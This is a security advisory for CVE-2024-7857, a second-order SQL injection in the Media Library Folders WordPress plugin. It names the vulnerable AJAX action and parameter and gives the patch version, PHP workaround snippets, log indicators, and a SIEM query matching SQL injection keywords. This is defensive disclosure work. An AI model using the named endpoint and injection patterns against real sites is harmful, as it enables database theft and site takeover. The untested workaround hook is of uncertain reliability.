CVE-2024-7857
📋 TL;DR
The Media Library Folders WordPress plugin has a second-order SQL injection vulnerability that allows authenticated attackers with subscriber-level access or higher to inject malicious SQL queries. This can lead to extraction of sensitive database information like user credentials or site data. All WordPress sites using this plugin up to version 8.2.2 are affected.
💻 Affected Systems
- Media Library Folders WordPress plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete database compromise including extraction of administrator credentials, user data, and site content, potentially leading to full site takeover and data exfiltration.
Likely Case
Extraction of sensitive information from the WordPress database including user credentials, plugin settings, and potentially other site data stored in the database.
If Mitigated
Limited impact if proper input validation and prepared statements are implemented, restricting attackers to data extraction only within the plugin's database context.
🎯 Exploit Status
Exploitation requires authenticated access but the SQL injection is straightforward once authenticated. The vulnerability is well-documented with specific parameter and function details available.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 8.2.3 or later
Vendor Advisory: https://plugins.trac.wordpress.org/changeset/3139954/media-library-plus/trunk/media-library-plus.php
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Media Library Folders plugin. 4. Click 'Update Now' if update is available. 5. Alternatively, download version 8.2.3+ from WordPress plugin repository and manually update.
🔧 Temporary Workarounds
Disable vulnerable AJAX endpoint
allRemove or restrict access to the vulnerable mlf_change_sort_type AJAX action
Add to theme's functions.php or custom plugin: remove_action('wp_ajax_mlf_change_sort_type', 'mlf_change_sort_type'); remove_action('wp_ajax_nopriv_mlf_change_sort_type', 'mlf_change_sort_type');
Input validation filter
allAdd input validation for the sort_type parameter before it reaches the vulnerable function
Add to theme's functions.php: add_filter('pre_mlf_change_sort_type', function($sort_type) { return in_array($sort_type, ['asc', 'desc', 'name', 'date']) ? $sort_type : 'name'; });
🧯 If You Can't Patch
- Temporarily deactivate the Media Library Folders plugin until patched
- Implement strict user access controls and monitor for suspicious database queries from subscriber-level accounts
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for Media Library Folders version 8.2.2 or earlierCheck Version:
wp plugin list --name='Media Library Folders' --field=versionVerify Fix Applied:
Verify plugin version is 8.2.3 or later in WordPress admin panel📡 Detection & Monitoring
Log Indicators:
- Unusual SQL queries in WordPress debug logs
- Multiple AJAX requests to admin-ajax.php with mlf_change_sort_type action
- Database queries with unusual ORDER BY clauses from subscriber accounts
Network Indicators:
- POST requests to /wp-admin/admin-ajax.php with action=mlf_change_sort_type containing SQL injection patterns
- Unusual database response sizes from WordPress backend
SIEM Query:
source="wordpress.log" AND "admin-ajax.php" AND "mlf_change_sort_type" AND ("UNION" OR "SELECT" OR "FROM" OR "WHERE" OR "ORDER BY")🔗 References
- https://plugins.trac.wordpress.org/browser/media-library-plus/tags/8.2.2/media-library-plus.php#L1766
- https://plugins.trac.wordpress.org/browser/media-library-plus/tags/8.2.2/media-library-plus.php#L3339
- https://plugins.trac.wordpress.org/changeset/3139954/media-library-plus/trunk/media-library-plus.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d2266254-9281-4859-8630-f7bb5c0ead19?source=cve
